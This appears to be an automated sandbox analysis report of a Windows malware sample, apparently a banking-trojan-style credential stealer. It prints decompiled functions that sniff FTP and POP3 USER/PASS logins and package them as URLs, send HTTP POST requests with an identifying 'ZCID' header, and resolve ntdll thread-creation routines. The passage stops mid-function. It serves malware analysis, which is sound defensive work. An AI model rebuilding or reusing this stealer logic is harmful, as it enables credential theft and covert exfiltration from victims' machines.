Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
Instruction ID: 66392101b20d4fd1da8d41004f6e2211efc2af99ea2e934d81e7eda41824d63f
Opcode Fuzzy Hash: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
Instruction Fuzzy Hash: FA51C336E00525DBDB248F98C4906ADB7B1EF85324F1A46BACD16BF3C1C675AD41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0040B65A, Relevance: .1, Instructions: 72
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040B65A() {
				signed int _t18;
				signed int _t38;
				signed int _t55;
				signed int _t56;
				signed int* _t59;
				signed int _t60;
				signed int* _t61;

				_t18 =  *0x41a578; // 0x1
				if(_t18 >= 0x270) {
					_t60 = 0;
					do {
						_t55 = _t60 << 2;
						_t1 = _t55 + 0x419bac; // 0xfed31d4f
						_t2 = 0x419ba8 + _t55; // 0xc0004aad
						_t3 = 0x419ba8 + _t55; // 0xc0004aad
						_t6 = _t55 + 0x41a1dc; // 0x2176531b
						_t60 = _t60 + 1;
						 *(0x419ba8 + _t55) = (( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) >> 0x00000001 ^  *(0x419180 + ((( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) & 0x00000001) * 4) ^  *_t6;
					} while (_t60 < 0xe3);
					if(_t60 < 0x26f) {
						_t59 =  &(0x419ba8[_t60]);
						do {
							_t10 =  &(_t59[1]); // 0x4
							_t61 = _t10;
							 *_t59 =  *(0x419180 + ((( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) & 0x00000001) * 4) ^  *(_t61 - 0x390) ^ (( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) >> 0x00000001;
							_t59 = _t61;
						} while (_t59 < 0x41a564);
					}
					_t56 =  *0x41a564; // 0xf488ac72
					_t38 =  *0x419ba8; // 0xc0004aad
					 *0x41a564 = ((_t38 ^ _t56) & 0x7fffffff ^ _t56) >> 0x00000001 ^  *(0x419180 + (((_t38 ^ _t56) & 0x7fffffff ^ _t56) & 0x00000001) * 4) ^  *0x41a1d8;
					_t18 = 0;
				}
				 *0x41a578 = _t18 + 1;
				return (0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b ^ ((0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b ^ ((0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b ^ ((0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b ^ ((0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}

0x0040b65a
0x0040b664
0x0040b66c
0x0040b673
0x0040b675
0x0040b678
0x0040b67e
0x0040b686
0x0040b69a
0x0040b6a0
0x0040b6a7
0x0040b6a7
0x0040b6b5
0x0040b6b7
0x0040b6be
0x0040b6c0
0x0040b6c0
0x0040b6df
0x0040b6e1
0x0040b6e3
0x0040b6be
0x0040b6eb
0x0040b6f1
0x0040b712
0x0040b717
0x0040b717
0x0040b721
0x0040b74c

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f410da16a933331692006821d7277e76283c3cd78b8982641975c42ce8ce4740
Instruction ID: 6769b1db74bd83bc0a3a43a485cf3d1d505ca6aa5d13b18bf1ae29d086b6149f
Opcode Fuzzy Hash: f410da16a933331692006821d7277e76283c3cd78b8982641975c42ce8ce4740
Instruction Fuzzy Hash: DF217F323254019FD708CF38ECA9AD633E2F789358719897DD519CB290D63AE853DB49

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBCB, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction ID: 2942c08de1fa596666361ff0938991d7902a9c36578c64e2544f4b6332540ea4
Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction Fuzzy Hash: 8DE0DF7A3000108BC710CA12D480943B7B2FBC8330B128AB6D8168B345C938FDC385D1

Uniqueness

Uniqueness Score: -1.00%

Function 004073D9, Relevance: 35.1, APIs: 9, Strings: 11, Instructions: 82
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004073D9(void* __edx, signed int _a4) {
				void* __edi;
				void* _t4;
				struct HINSTANCE__* _t6;
				void* _t7;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t15;
				struct HINSTANCE__* _t16;
				void* _t19;
				void* _t20;
				intOrPtr _t21;

				_t20 = __edx;
				_t21 = E0040EBCB();
				 *0x4192e8 = _t21;
				if(_t21 != 0) {
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) != 0) {
						_t4 = E00407311(_t19, _t20, _t21, "GetProcAddress");
						_t6 = E0040F132(_t19,  *0x4192e4, E00407311(_t19, _t20, _t21, "LoadLibraryA"), _t4);
						__eflags = _t6;
						if(_t6 == 0) {
							L4:
							_t7 = 0;
							__eflags = 0;
							L5:
							return _t7;
						}
						L8:
						_t8 = GetModuleHandleW(L"ntdll.dll");
						 *0x4192ec = _t8;
						__eflags = _t8;
						if(_t8 == 0) {
							goto L4;
						}
						 *0x4192f0 = GetProcAddress(_t8, "NtCreateThread");
						 *0x4192f4 = GetProcAddress( *0x4192ec, "NtCreateUserProcess");
						 *0x4192f8 = GetProcAddress( *0x4192ec, "NtQueryInformationProcess");
						 *0x4192fc = GetProcAddress( *0x4192ec, "RtlCreateUserThread");
						 *0x419300 = GetProcAddress( *0x4192ec, "RtlUserThreadStart");
						 *0x419304 = GetProcAddress( *0x4192ec, "LdrLoadDll");
						_t15 = GetProcAddress( *0x4192ec, "LdrGetDllHandle");
						 *0x419308 = _t15;
						__eflags =  *0x4192f0; // 0x77e599e0
						if(__eflags != 0) {
							L11:
							__eflags =  *0x4192f8; // 0x77e59670
							if(__eflags == 0) {
								goto L4;
							}
							__eflags =  *0x4192fc; // 0x77e57550
							if(__eflags == 0) {
								goto L4;
							}
							__eflags =  *0x419304; // 0x77e27840
							if(__eflags == 0) {
								goto L4;
							}
							__eflags = _t15;
							if(_t15 == 0) {
								goto L4;
							}
							_t7 = 1;
							goto L5;
						}
						__eflags =  *0x4192f4; // 0x77e5a120
						if(__eflags == 0) {
							goto L4;
						}
						goto L11;
					}
					_t16 = GetModuleHandleW(0);
					 *0x4192e4 = _t16;
					__eflags = _t16;
					if(_t16 != 0) {
						goto L8;
					}
					goto L4;
				}
				return 0;
			}

0x004073d9
0x004073e0
0x004073e4
0x004073ec
0x004073f2
0x004073fe
0x00407419
0x00407430
0x00407435
0x00407437
0x0040740c
0x0040740c
0x0040740c
0x0040740e
0x00000000
0x0040740e
0x00407439
0x0040743e
0x00407440
0x00407445
0x00407447
0x00000000
0x00000000
0x00407462
0x00407474
0x00407486
0x00407498
0x004074aa
0x004074bc
0x004074c1
0x004074c3
0x004074c8
0x004074ce
0x004074dc
0x004074dc
0x004074e2
0x00000000
0x00000000
0x004074e8
0x004074ee
0x00000000
0x00000000
0x004074f4
0x004074fa
0x00000000
0x00000000
0x00407500
0x00407502
0x00000000
0x00000000
0x00407508
0x00000000
0x00407508
0x004074d0
0x004074d6
0x00000000
0x00000000
0x00000000
0x004074d6
0x00407401
0x00407403
0x00407408
0x0040740a
0x00000000
0x00000000
0x00000000
0x0040740a
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,00000000,004077C2), ref: 00407401
GetModuleHandleW.KERNEL32(ntdll.dll,00000000,LoadLibraryA,00000000,GetProcAddress,00000000,?,00000000,004077C2), ref: 0040743E
GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00407455
GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00407467
GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00407479
GetProcAddress.KERNEL32(RtlCreateUserThread), ref: 0040748B
GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040749D
GetProcAddress.KERNEL32(LdrLoadDll), ref: 004074AF
GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 004074C1

Strings

NtCreateThread, xrefs: 0040744F
GetProcAddress, xrefs: 00407414
RtlUserThreadStart, xrefs: 0040748D
@xw, xrefs: 004074BC, 004074F4
LoadLibraryA, xrefs: 0040741F
LdrGetDllHandle, xrefs: 004074B1
NtQueryInformationProcess, xrefs: 00407469
ntdll.dll, xrefs: 00407439
LdrLoadDll, xrefs: 0040749F
NtCreateUserProcess, xrefs: 00407457
RtlCreateUserThread, xrefs: 0040747B

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: @xw$GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlCreateUserThread$RtlUserThreadStart$ntdll.dll
API String ID: 667068680-2525058245
Opcode ID: cd293f4c60bc6f914a2b1dacce8efa09c38baa10aeecff3b2ea2009002d9643f
Instruction ID: 3a20010c5c1cb7ddc541a9f25b56d73d7092df28e1e2c85fbe0d47f7a82f3eb2
Opcode Fuzzy Hash: cd293f4c60bc6f914a2b1dacce8efa09c38baa10aeecff3b2ea2009002d9643f
Instruction Fuzzy Hash: 04214D71E05216BACF21AFB1ADD99D63F54A604704310C8BBED10B32E2D2BC1C41DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00404F4A, Relevance: 28.2, APIs: 4, Strings: 12, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00404F4A(char* __eax, intOrPtr _a4, intOrPtr _a8) {
				char _v536;
				char _v652;
				char _v656;
				char* _v660;
				char _v661;
				char _v664;
				intOrPtr _v672;
				signed char _v673;
				void* __edi;
				void* __esi;
				char* _t39;
				char* _t45;
				char* _t47;
				intOrPtr _t48;
				intOrPtr _t55;
				char* _t57;
				char* _t59;
				char* _t61;
				char* _t63;
				char _t64;
				void* _t67;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				void* _t90;
				void* _t92;
				intOrPtr _t93;
				char* _t95;
				void* _t97;
				intOrPtr _t100;
				void* _t101;
				char* _t102;
				void* _t103;
				intOrPtr* _t104;

				_t95 = __eax;
				if(_a4 == 0xffffffff || __eax == 0) {
					L50:
					_t39 = 0;
					__eflags = 0;
				} else {
					_t100 = _a8;
					if(_t100 > 0x200) {
						goto L50;
					} else {
						if(_t100 <= 6 || E00409868("USER ", __eax, 5) != 0 && E00409868("PASS ", _t95, 5) != 0) {
							__eflags = _t100 - 1;
							if(_t100 <= 1) {
								goto L50;
							} else {
								EnterCriticalSection(0x4191a8);
								_t80 = E00404E3E(_a4);
								__eflags = _t80;
								if(_t80 != 0) {
									__eflags =  *((intOrPtr*)(_t80 + 4));
									if( *((intOrPtr*)(_t80 + 4)) == 0) {
										L47:
										_push(0);
										goto L48;
									} else {
										__eflags =  *((intOrPtr*)(_t80 + 8));
										if( *((intOrPtr*)(_t80 + 8)) == 0) {
											goto L47;
										} else {
											__eflags = _t100 - 3;
											if(_t100 < 3) {
												L32:
												_t101 = 4;
												__eflags = _a8 - _t101;
												if(_a8 >= _t101) {
													_t45 = E00409868(_t95, "TYPE", _t101);
													__eflags = _t45;
													if(_t45 == 0) {
														goto L36;
													} else {
														_t57 = E00409868(_t95, "FEAT", _t101);
														__eflags = _t57;
														if(_t57 == 0) {
															goto L36;
														} else {
															_t59 = E00409868(_t95, "PASV", _t101);
															__eflags = _t59;
															if(_t59 != 0) {
																_t61 = E00409868(_t95, "STAT", _t101);
																__eflags = _t61;
																if(_t61 == 0) {
																	L39:
																	_v661 = 0x65;
																	_v660 = L"pop3";
																	goto L40;
																} else {
																	_t63 = E00409868(_t95, "LIST", _t101);
																	__eflags = _t63;
																	if(_t63 == 0) {
																		goto L39;
																	}
																}
															} else {
																goto L36;
															}
														}
													}
												}
											} else {
												_t64 =  *_t95;
												__eflags = _t64 - 0x43;
												if(_t64 == 0x43) {
													L30:
													__eflags =  *((char*)(_t95 + 1)) - 0x57;
													if( *((char*)(_t95 + 1)) != 0x57) {
														goto L32;
													} else {
														__eflags =  *((char*)(_t95 + 2)) - 0x44;
														if( *((char*)(_t95 + 2)) == 0x44) {
															L36:
															_v661 = 0x64;
															_v660 = L"ftp";
															L40:
															_t47 =  &_v652;
															_v656 = 0x80;
															__imp__#5(_a4, _t47,  &_v656);
															__eflags = _t47;
															if(_t47 == 0) {
																_t84 =  &_v664;
																_t48 = E0040CCDB( &_v664);
																__eflags = _t48;
																if(_t48 == 0) {
																	__eflags = _v673 - 0x64;
																	if(_v673 != 0x64) {
																		L44:
																		__eflags = _v673 - 0x65;
																		if(_v673 == 0x65) {
																			goto L45;
																		}
																	} else {
																		_t84 =  *((intOrPtr*)(_t80 + 4));
																		_t97 = 9;
																		_t55 = E0040A457(L"anonymous",  *((intOrPtr*)(_t80 + 4)), _t97);
																		__eflags = _t55;
																		if(_t55 != 0) {
																			L45:
																			_t102 =  &_v536;
																			E0040CC92( &_v664, _t84, _t102);
																			_push(_t102);
																			_push( *((intOrPtr*)(_t80 + 8)));
																			_push( *((intOrPtr*)(_t80 + 4)));
																			E00412544(_t84, _t92, __eflags, _v673 & 0x000000ff, 0, 0, L"%s://%s:%s@%s/", _v672);
																		} else {
																			goto L44;
																		}
																	}
																}
															}
															_push(0);
															L48:
															E00404EDF(_t80);
														} else {
															goto L32;
														}
													}
												} else {
													__eflags = _t64 - 0x50;
													if(_t64 != 0x50) {
														goto L32;
													} else {
														goto L30;
													}
												}
											}
										}
									}
								}
								_t81 = 0;
								goto L22;
							}
						} else {
							_t103 = _t100 + 0xfffffffb;
							_t67 = 0;
							_t90 = _t95 + 5;
							if(_t103 <= 0) {
								goto L50;
							} else {
								while(1) {
									_t93 =  *((intOrPtr*)(_t67 + _t90));
									if(_t93 == 0xd || _t93 == 0xa) {
										break;
									}
									if(_t93 < 0x20) {
										goto L50;
									} else {
										_t67 = _t67 + 1;
										if(_t67 < _t103) {
											continue;
										} else {
											break;
										}
									}
									goto L51;
								}
								if(_t67 == 0 || _t67 == _t103) {
									goto L50;
								} else {
									_t82 = E00409A3C(_t67, 0xfde9, _t90);
									if(_t82 == 0) {
										goto L50;
									} else {
										_v661 = 0;
										EnterCriticalSection(0x4191a8);
										_t104 = E00404E3E(_a4);
										if(_t104 != 0) {
											L17:
											__eflags =  *_t95 - 0x55;
											_v661 = 1;
											if( *_t95 != 0x55) {
												E004097F7( *((intOrPtr*)(_t104 + 8)));
												 *((intOrPtr*)(_t104 + 8)) = _t82;
											} else {
												E00404EDF(_t104, 1);
												 *((intOrPtr*)(_t104 + 4)) = _t82;
											}
											 *_t104 = _a4;
										} else {
											_t104 = E00404E77(_a4);
											if(_t104 != 0) {
												goto L17;
											} else {
												E004097F7(_t82);
											}
										}
										_t81 = _v661;
										L22:
										LeaveCriticalSection(0x4191a8);
										_t39 = _t81;
									}
								}
							}
						}
					}
				}
				L51:
				return _t39;
			}

0x00404f5d
0x00404f5f
0x004051da
0x004051da
0x004051da
0x00404f6d
0x00404f6d
0x00404f76
0x00000000
0x00404f7c
0x00404f7f
0x0040506f
0x00405072
0x00000000
0x00405078
0x0040507d
0x0040508b
0x0040508f
0x00405091
0x00405097
0x0040509a
0x004051cb
0x004051cb
0x00000000
0x004050a0
0x004050a0
0x004050a3
0x00000000
0x004050a9
0x004050a9
0x004050ac
0x004050c4
0x004050c6
0x004050c7
0x004050ca
0x004050d8
0x004050dd
0x004050df
0x00000000
0x004050e1
0x004050e9
0x004050ee
0x004050f0
0x00000000
0x004050f2
0x004050fa
0x004050ff
0x00405101
0x0040511a
0x0040511f
0x00405121
0x00405138
0x00405138
0x0040513d
0x00000000
0x00405123
0x0040512b
0x00405130
0x00405132
0x00000000
0x00000000
0x00405132
0x00000000
0x00000000
0x00000000
0x00405101
0x004050f0
0x004050df
0x004050ae
0x004050ae
0x004050b0
0x004050b2
0x004050b8
0x004050b8
0x004050bc
0x00000000
0x004050be
0x004050be
0x004050c2
0x00405103
0x00405103
0x00405108
0x00405145
0x0040514a
0x00405152
0x0040515a
0x00405160
0x00405162
0x00405164
0x00405168
0x0040516d
0x0040516f
0x00405171
0x00405176
0x0040518c
0x0040518c
0x00405191
0x00000000
0x00000000
0x00405178
0x00405178
0x0040517d
0x00405183
0x00405188
0x0040518a
0x00405193
0x00405193
0x0040519e
0x004051a5
0x004051a6
0x004051ae
0x004051bf
0x00000000
0x00000000
0x00000000
0x0040518a
0x00405176
0x0040516f
0x004051c7
0x004051cc
0x004051ce
0x00000000
0x00000000
0x00000000
0x004050c2
0x004050b4
0x004050b4
0x004050b6
0x00000000
0x00000000
0x00000000
0x00000000
0x004050b6
0x004050b2
0x004050ac
0x004050a3
0x0040509a
0x004051d3
0x00000000
0x004051d3
0x00404fad
0x00404fad
0x00404fb0
0x00404fb2
0x00404fb7
0x00000000
0x00404fbd
0x00404fbd
0x00404fbd
0x00404fc3
0x00000000
0x00000000
0x00404fcd
0x00000000
0x00404fd3
0x00404fd3
0x00404fd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00404fd6
0x00000000
0x00404fcd
0x00404fda
0x00000000
0x00404fe8
0x00404ff3
0x00404ff7
0x00000000
0x00404ffd
0x00405002
0x00405007
0x00405015
0x00405019
0x00405031
0x00405031
0x00405034
0x00405039
0x0040504c
0x00405051
0x0040503b
0x0040503f
0x00405044
0x00405044
0x00405057
0x0040501b
0x00405023
0x00405027
0x00000000
0x00405029
0x0040502a
0x0040502a
0x00405027
0x00405059
0x0040505d
0x00405062
0x00405068
0x00405068
0x00404ff7
0x00404fda
0x00404fb7
0x00404f7f
0x00404f76
0x004051dc
0x004051e2

APIs

EnterCriticalSection.KERNEL32(004191A8,0000FDE9,?,00000005), ref: 00405007
LeaveCriticalSection.KERNEL32(004191A8,?,000000FF), ref: 00405062
EnterCriticalSection.KERNEL32(004191A8), ref: 0040507D
getpeername.WS2_32(000000FF,00000004,00000004), ref: 0040515A

Strings

FEAT, xrefs: 004050E4
LIST, xrefs: 00405126
PASS , xrefs: 00404F99
e, xrefs: 0040518C
USER , xrefs: 00404F87
pop3, xrefs: 0040513D
STAT, xrefs: 00405115
anonymous, xrefs: 0040517E
PASV, xrefs: 004050F5
TYPE, xrefs: 004050D3
%s://%s:%s@%s/, xrefs: 004051B5
ftp, xrefs: 00405108

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$Leavegetpeername
String ID: %s://%s:%s@%s/$FEAT$LIST$PASS $PASV$STAT$TYPE$USER $anonymous$e$ftp$pop3
API String ID: 1099368488-1497436601
Opcode ID: a78e4b605bb7dce220fca66528b18a592da3fdd5101b89c53ee9855d16ef0e57
Instruction ID: 41f81782623d15271c447531b7a8a7657cff6ecb66a7124e14311163c83fe11a
Opcode Fuzzy Hash: a78e4b605bb7dce220fca66528b18a592da3fdd5101b89c53ee9855d16ef0e57
Instruction Fuzzy Hash: 6D610831A04B41A6DB20AA258C4176F7A99DF51344F04853FF994BE3D2D77DCC448BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00404846, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 176
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00404846(intOrPtr* _a4) {
				void _v12;
				long _v16;
				void* _v20;
				void* _v24;
				char _v26;
				short _v28;
				char* _v36;
				char* _v40;
				void* _v44;
				intOrPtr _v48;
				char _v532;
				char _v536;
				void* __ebx;
				void* __esi;
				void* _t57;
				void* _t60;
				intOrPtr _t62;
				signed int _t69;
				void _t90;
				void* _t94;
				intOrPtr* _t97;
				void* _t98;
				void _t99;
				char* _t100;
				void* _t113;

				_t97 = _a4;
				if(E0040F919( &_v40,  *((intOrPtr*)(_t97 + 4))) == 0) {
					L26:
					return 0;
				}
				_t57 = InternetOpenA( *0x419548, 0, 0, 0, 0);
				_v44 = _t57;
				if(_t57 == 0) {
					L25:
					E004097F7(_v40);
					E004097F7(_v36);
					goto L26;
				}
				_t60 = InternetConnectA(_t57, _v40, _v28, 0, 0, 3, 0, 0);
				_v20 = _t60;
				if(_t60 == 0) {
					L24:
					InternetCloseHandle(_v44);
					goto L25;
				}
				_t62 =  *_t97;
				_t100 = "POST";
				if( *((char*)(_t62 + 0x14)) != 1) {
					_t100 = "GET";
				}
				_t98 = HttpOpenRequestA(_v20, _t100, _v36, "HTTP/1.1",  *(_t62 + 4), 0, (0 | _v26 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
				_v24 = _t98;
				if(_t98 == 0) {
					L23:
					InternetCloseHandle(_v20);
					goto L24;
				} else {
					E00407B82(_t100,  &_v536);
					_t68 =  *_a4;
					if( *((intOrPtr*)( *_a4 + 0x1c)) > 0) {
						_t94 = E0040A545( &_v16, "Content-Type: %s\r\n",  *((intOrPtr*)(_t68 + 0x18)));
						_t113 = _t113 + 0xc;
						if(_t94 > 0) {
							HttpAddRequestHeadersA(_t98, _v16, 0xffffffff, 0xa0000000);
							E004097F7(_v16);
						}
					}
					_t69 = E0040A3AA( &_v532);
					_v12 = _t69;
					_t72 = 2 + _t69 * 6;
					if(2 + _t69 * 6 == 0) {
						L12:
						_v12 = 0;
						goto L13;
					} else {
						_t90 = E004097CC(_t72);
						_v48 = _t90;
						if(_t90 == 0) {
							goto L12;
						}
						_t99 = _t90;
						E0040FC4C(_t99,  &_v532, _v12);
						_t98 = _v24;
						_v12 = _t99;
						L13:
						if(_v12 != 0 && E0040A545( &_v16, "ZCID: %S\r\n", _v12) > 0) {
							HttpAddRequestHeadersA(_t98, _v16, 0xffffffff, 0xa0000000);
							E004097F7(_v16);
						}
						E004097F7(_v12);
						if(HttpSendRequestA(_t98, 0, 0,  *( *_a4 + 0x20),  *( *_a4 + 0x24)) != 1) {
							L22:
							InternetCloseHandle(_t98);
							goto L23;
						} else {
							_v16 = 4;
							_v12 = 0;
							if(HttpQueryInfoA(_t98, 0x20000013,  &_v12,  &_v16, 0) != 1 || _v12 != 0xc8) {
								goto L22;
							} else {
								if(E0040AF2B( &_v16, _t98) != 0) {
									E004097F7(_t81);
								}
								E004097F7(_v40);
								E004097F7(_v36);
								 *(_a4 + 8) = _v24;
								goto L26;
							}
						}
					}
				}
			}

0x00404850
0x00404862
0x00404a51
0x00404a55
0x00404a55
0x00404874
0x0040487a
0x0040487f
0x00404a3f
0x00404a42
0x00404a4a
0x00000000
0x00404a4a
0x00404892
0x00404898
0x0040489d
0x00404a36
0x00404a39
0x00000000
0x00404a39
0x004048a3
0x004048a9
0x004048ae
0x004048b0
0x004048b0
0x004048e3
0x004048e5
0x004048ea
0x00404a2d
0x00404a30
0x00000000
0x004048f0
0x004048f7
0x004048ff
0x0040490a
0x00404918
0x0040491d
0x00404922
0x0040492f
0x00404934
0x00404934
0x00404922
0x0040493f
0x00404944
0x0040494b
0x0040494c
0x00404975
0x00404975
0x00000000
0x0040494e
0x0040494e
0x00404953
0x00404958
0x00000000
0x00000000
0x00404964
0x00404966
0x0040496d
0x00404970
0x00404978
0x0040497b
0x004049a0
0x004049a5
0x004049a5
0x004049ad
0x004049c9
0x00404a26
0x00404a27
0x00000000
0x004049cb
0x004049da
0x004049e1
0x004049ed
0x00000000
0x004049f8
0x00404a03
0x00404a06
0x00404a06
0x00404a0e
0x00404a16
0x00404a21
0x00000000
0x00404a21
0x004049ed
0x004049c9
0x0040494c

APIs

Part of subcall function 0040F919: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0040F948

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00404874
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404892
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 004048DD
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040492F
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 004049A0
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 004049C0
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 004049E4
InternetCloseHandle.WININET(00000000), ref: 00404A27
InternetCloseHandle.WININET(?), ref: 00404A30

Part of subcall function 0040AF2B: InternetQueryOptionA.WININET(00000000,00000022,00000000,00000004), ref: 0040AF3F
Part of subcall function 0040AF2B: GetLastError.KERNEL32 ref: 0040AF45
Part of subcall function 0040AF2B: InternetQueryOptionA.WININET(00000022,00000022,00000000,00000004), ref: 0040AF69

Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A

InternetCloseHandle.WININET(?), ref: 00404A39

Strings

ZCID: %S, xrefs: 00404983
HTTP/1.1, xrefs: 004048D1
POST, xrefs: 004048A9
GET, xrefs: 004048B0, 004048D9
Content-Type: %s, xrefs: 00404912

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
String ID: Content-Type: %s$GET$HTTP/1.1$POST$ZCID: %S
API String ID: 1023423486-1483906197
Opcode ID: 6e4c28c2d5e9fec90003e8ccb70b3b2aff4d0fd502f898f28901ed64ef10fc26
Instruction ID: 96c450595c7bb05133d8431c0057e0f42123c392022799eca07488b1e8148781
Opcode Fuzzy Hash: 6e4c28c2d5e9fec90003e8ccb70b3b2aff4d0fd502f898f28901ed64ef10fc26
Instruction Fuzzy Hash: FA516DB1D00109BFCF11AFA5CD89D9E7FB9FB89704F10447AF601B62A1D6399A40DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405B9D, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00405B9D(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				short _v528;
				int _v532;
				WCHAR* _v536;
				WCHAR* _v540;
				WCHAR* _v544;
				WCHAR* _v548;
				intOrPtr _v552;
				void* __edi;
				WCHAR* _t42;
				long _t43;
				intOrPtr _t52;
				int _t57;
				void* _t65;
				short* _t77;
				WCHAR* _t85;
				WCHAR* _t86;
				intOrPtr _t88;
				signed int _t93;
				void* _t95;

				_t95 = (_t93 & 0xfffffff8) - 0x21c;
				if(E0040B635( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L21:
					return 1;
				}
				if(( *__edx & 0x00000010) == 0) {
					_t42 = HeapAlloc( *0x41a570, 8, 0x20002);
					_v540 = _t42;
